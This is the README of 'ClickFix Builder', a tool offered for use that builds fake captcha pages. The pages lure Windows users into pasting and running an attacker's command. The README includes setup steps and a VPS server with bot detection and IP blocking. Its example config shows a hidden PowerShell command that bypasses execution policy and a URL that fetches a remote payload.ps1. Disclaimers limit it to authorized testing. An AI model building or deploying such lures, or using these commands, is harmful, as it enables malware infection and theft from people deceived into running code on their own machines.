ClickFix Builder is a professional‑grade tool for red teamers, pentesters, and security researchers.
It generates realistic fake captcha technique to execute a malware command
into windows target
The builder supports two deployment modes:
| Mode | Description |
|---|---|
| 📦 Portable File | Single Generate Stub/HTML/JS file |
| 🌐 VPS Deploy | HTTP server with logging, blocking, and monitoring |
- Clipboard interaction target
- Fully customizable command/payload
- Base64 encoding support
- Dark-mode GUI (PyQt6)
- Generates:
stub.jsindex.htmlpayload.html
- Works offline
- Easy distribution/testing
- Built-in Python HTTP server
- IP blocking:
- Single IP
- CIDR ranges
- Dash ranges
- Bot detection
- Live request logging
- Manual blocking via GUI
- Rule file support
- Real-time stats
- Auto-refresh HTML reports
- Stored in:~/StubBuilder_Reports/
git clone https://github.com/drcrypterdotru/clickfix-builder.git
cd clickfix-builder
pip install -r requirements.txt
python ClickFix_Builder.py
Requirements
Python 3.8+
PyQt6
pip install PyQt6
Launch the app
Enter your command
(Optional) Enable Base64 mode
Click BUILD PORTABLE FILES
payload.html (main file)
index.html
stub.js
Switch to VPS Deploy mode
Configure rules (optional)
Click START VPS SERVER
Access: http://your-vps-ip:8080
All settings can be saved as JSON.
Example config.json
{
"command": "powershell -ExecutionPolicy Bypass -w hidden -c \"...\"",
"custom_url_execute": "http://example.com/payload.ps1",
"blocking": {
"enabled": true,
"rules": [
"192.168.1.100",
"10.0.0.0/24",
"172.16.1.1-172.16.1.50"
],
"file": ""
},
"server": {
"host": "0.0.0.0",
"port": 8080
}
}
This tool is intended for:
- Authorized security testing
- Red team exercises
- Educational research
❌ Do NOT use without permission.
- UI mimics verification flow
- User interaction triggers scripted behavior
- Command execution occurs in your target
- VPS mode logs all activity
- Reports generated in real-time
Use GUI System Log
Check reports at:
🌐 Community & Resources
Tools, updates, and community resources.
This tool is for educational purposes only. 🏫 The creator and contributors are not responsible for any misuse or damages caused. Use responsibly, and only on systems you own or have permission for. ✅